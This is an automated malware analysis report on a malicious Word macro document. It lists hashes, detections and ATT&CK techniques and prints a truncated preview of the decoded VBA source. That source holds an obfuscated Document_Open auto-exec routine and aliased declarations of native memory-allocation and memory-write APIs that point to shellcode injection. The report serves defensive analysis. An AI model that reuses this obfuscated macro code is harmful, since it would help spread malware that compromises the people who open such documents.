Office (OLE) malware analysis — malicious · d2ddcfd70f9fb7eb

MALICIOUS

Office (OLE)

215.0 KB Created: 2017-10-30 13:51:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: 64cf4f4ec92dbf46394741692e9ada33 SHA-1: 52072805eb4d687964928c63b517b69a7a799c13 SHA-256: d2ddcfd70f9fb7eba158c1ce17438bd9328ddfaa6507428be4f802402b15ab9e

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and configured to execute shell commands, indicating an intent to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6360759-0' further supports its malicious nature as a dropper.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6360759-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6360759-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45372 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45372 bytes
SHA-256: `a28c9e12bf1cd0f0c531f892034308476238350b57828b7402208f204e79fb28`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub numStyle() ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _ .PageNumbers.NumberStyle = wdPageNumberStyleLowercaseLetter End Sub Private Sub Document_Open() Dim chichewa As Variant Dim tallgrass As String begrimed = "blasphemously" bearable = "insculptured" woland.barroom hospes = 10 + 90 teucrium = 8520 + 7 unthreatened = 105260 + 4 Pmt 0, hospes, 27087, 31782, 7 End Sub Attribute VB_Name = "blast" #If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (35 - 7 * 5) * 4 Then Public Declare PtrSafe Function inflation Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (twirlingly As Any, ByVal crucis As Any, ByVal sophistication As Any, ByVal dreaming As Any, ByVal achromatous As Any, ByVal assembler As Any, ByVal attemptable As Any) As LongPtr Public Declare PtrSafe Function dichotomization Lib "Shlwapi.dll " Alias _ "GetOverlappedResult" (ByVal aestival As Any, acquirable As Any, disa As Any, corgi As Any) As LongPtr Public Declare PtrSafe Function doughface Lib "ntdll.dll" Alias _ "NtCreateEventPair" (humorsome As LongPtr, chromatogenous As LongPtr, ink As LongPtr) As LongPtr Public Declare PtrSafe Function employe Lib "Kernel32.dll" Alias _ "CreateEventW" (ByVal nervy As LongPtr, revelling As LongPtr, tibetan As LongPtr, celluloid As LongPtr, domine As LongPtr) As Long Public Declare PtrSafe Function utricle Lib "Shlwapi.dll " Alias _ "SleepConditionVariableSRW" (ByVal malaprop As Any, damage As Any, tranquillization As Any, associate As Any) As LongPtr Public Declare PtrSafe Function zocle Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (onesided As LongPtr, causation As LongPtr, ByVal misinformaton As LongPtr, dispassionByVal As LongPtr, astonished As LongPtr, ByVal loge As LongPtr) As LongPtr Public Declare PtrSafe Function classman Lib "Ntdll.dll " Alias _ "AcquireSRWLockShared" (bearing As Any) As LongPtr Public Declare PtrSafe Function vergent Lib "Ntdll.dll " Alias _ "NtWriteVirtualMemory" (ByVal dactyl As Any, ByVal geisha As Any, ByVal mormon As Any, ByVal bloodsucking As Any, ByVal asleep As Any) As LongPtr Public Declare PtrSafe Function coastguard Lib "Shlwapi.dll" Alias _ "CreateFileWrapW" (amylolysis As LongPtr) As LongPtr #End If Public Function undebauched(manakin, avec, inflammable) #If (7 * 4 + 5) > (7 - 2 * 1) And (35 - 7 * 5) * 4 < (Win64) Then Dim asymptoptic As Byte Dim voiced As Integer Dim groundspeed As LongPtr Dim abound As LongPtr Dim bronchitic As LongPtr Dim acervation As Byte Dim anerythmon As LongPtr Dim smitten As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then Dim abound As Long Dim omne As Long Dim groundspeed As Long Dim pericardial As Byte Dim anerythmon As Long Dim coactive As Long Dim bronchitic As Long Dim iodoprotein As String Dim smitten As Long Dim jurisdiction As Integer Dim reproachfully As Integer #End If alopiidae = "misconjecture" alopiidae = "eliminate" abound = manakin smitten = inflammable cagliostro = Math.Round(424) anerythmon = avec commensurability = 23 vegetarian = 33824 neodarwinism = 361917 Pmt 0, commensurability, 34165, 31309, 5 dismal = Rnd(211) groundspeed = 122 - 125 + 2 vergent ByVal groundspeed, abound, anerythmon, smitten, bronchitic alopiidae = motheaten End Function Function remuda(nuptse) Dim gauger As Variant Dim plexiglas As Long Dim conjure As Integer Dim swing As Long #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim lamende As Long Dim aloneness As LongPtr legend = 11 - 35 + 32 Dim conqueror As LongPtr Dim unmodernized As Byte Dim bestially As Variant Dim bornagain As LongPtr Dim radiochlorine As Integer #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then Dim aloneness A ... (truncated)

SHA-256: a28c9e12bf1cd0f0c531f892034308476238350b57828b7402208f204e79fb28

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub numStyle()
ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _
.PageNumbers.NumberStyle = wdPageNumberStyleLowercaseLetter
End Sub
Private Sub Document_Open()
Dim chichewa As Variant
Dim tallgrass As String
begrimed = "blasphemously"
bearable = "insculptured"
woland.barroom
hospes = 10 + 90
teucrium = 8520 + 7
unthreatened = 105260 + 4
 Pmt 0, hospes, 27087, 31782, 7
End Sub






Attribute VB_Name = "blast"
#If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (35 - 7 * 5) * 4 Then
Public Declare PtrSafe Function inflation Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (twirlingly As Any, ByVal crucis As Any, ByVal sophistication As Any, ByVal dreaming As Any, ByVal achromatous As Any, ByVal assembler As Any, ByVal attemptable As Any) As LongPtr
Public Declare PtrSafe Function dichotomization Lib "Shlwapi.dll  " Alias _
"GetOverlappedResult" (ByVal aestival As Any, acquirable As Any, disa As Any, corgi As Any) As LongPtr
Public Declare PtrSafe Function doughface Lib "ntdll.dll" Alias _
"NtCreateEventPair" (humorsome As LongPtr, chromatogenous As LongPtr, ink As LongPtr) As LongPtr
Public Declare PtrSafe Function employe Lib "Kernel32.dll" Alias _
"CreateEventW" (ByVal nervy As LongPtr, revelling As LongPtr, tibetan As LongPtr, celluloid As LongPtr, domine As LongPtr) As Long
Public Declare PtrSafe Function utricle Lib "Shlwapi.dll  " Alias _
"SleepConditionVariableSRW" (ByVal malaprop As Any, damage As Any, tranquillization As Any, associate As Any) As LongPtr
Public Declare PtrSafe Function zocle Lib "Ntdll.dll  " Alias _
"NtAllocateVirtualMemory" (onesided As LongPtr, causation As LongPtr, ByVal misinformaton As LongPtr, dispassionByVal As LongPtr, astonished As LongPtr, ByVal loge As LongPtr) As LongPtr
Public Declare PtrSafe Function classman Lib "Ntdll.dll  " Alias _
"AcquireSRWLockShared" (bearing As Any) As LongPtr
Public Declare PtrSafe Function vergent Lib "Ntdll.dll  " Alias _
"NtWriteVirtualMemory" (ByVal dactyl As Any, ByVal geisha As Any, ByVal mormon As Any, ByVal bloodsucking As Any, ByVal asleep As Any) As LongPtr
Public Declare PtrSafe Function coastguard Lib "Shlwapi.dll" Alias _
"CreateFileWrapW" (amylolysis As LongPtr) As LongPtr
#End If

Public Function undebauched(manakin, avec, inflammable)
#If (7 * 4 + 5) > (7 - 2 * 1) And (35 - 7 * 5) * 4 < (Win64) Then
Dim asymptoptic As Byte
Dim voiced As Integer
Dim groundspeed As LongPtr
Dim abound As LongPtr
Dim bronchitic As LongPtr
Dim acervation As Byte
Dim anerythmon As LongPtr
Dim smitten As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then
Dim abound As Long
Dim omne As Long
Dim groundspeed As Long
Dim pericardial As Byte
Dim anerythmon As Long
Dim coactive As Long
Dim bronchitic As Long
Dim iodoprotein As String
Dim smitten As Long
Dim jurisdiction As Integer
Dim reproachfully As Integer
#End If
alopiidae = "misconjecture"
alopiidae = "eliminate"
abound = manakin
smitten = inflammable
cagliostro = Math.Round(424)
anerythmon = avec
commensurability = 23
vegetarian = 33824
neodarwinism = 361917
 Pmt 0, commensurability, 34165, 31309, 5

dismal = Rnd(211)
groundspeed = 122 - 125 + 2
vergent ByVal groundspeed, abound, anerythmon, smitten, bronchitic
alopiidae = motheaten
End Function
Function remuda(nuptse)
Dim gauger As Variant
Dim plexiglas As Long
Dim conjure As Integer
Dim swing As Long
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim lamende As Long
Dim aloneness As LongPtr
legend = 11 - 35 + 32
Dim conqueror As LongPtr
Dim unmodernized As Byte
Dim bestially As Variant
Dim bornagain As LongPtr
Dim radiochlorine As Integer
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then
Dim aloneness A
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.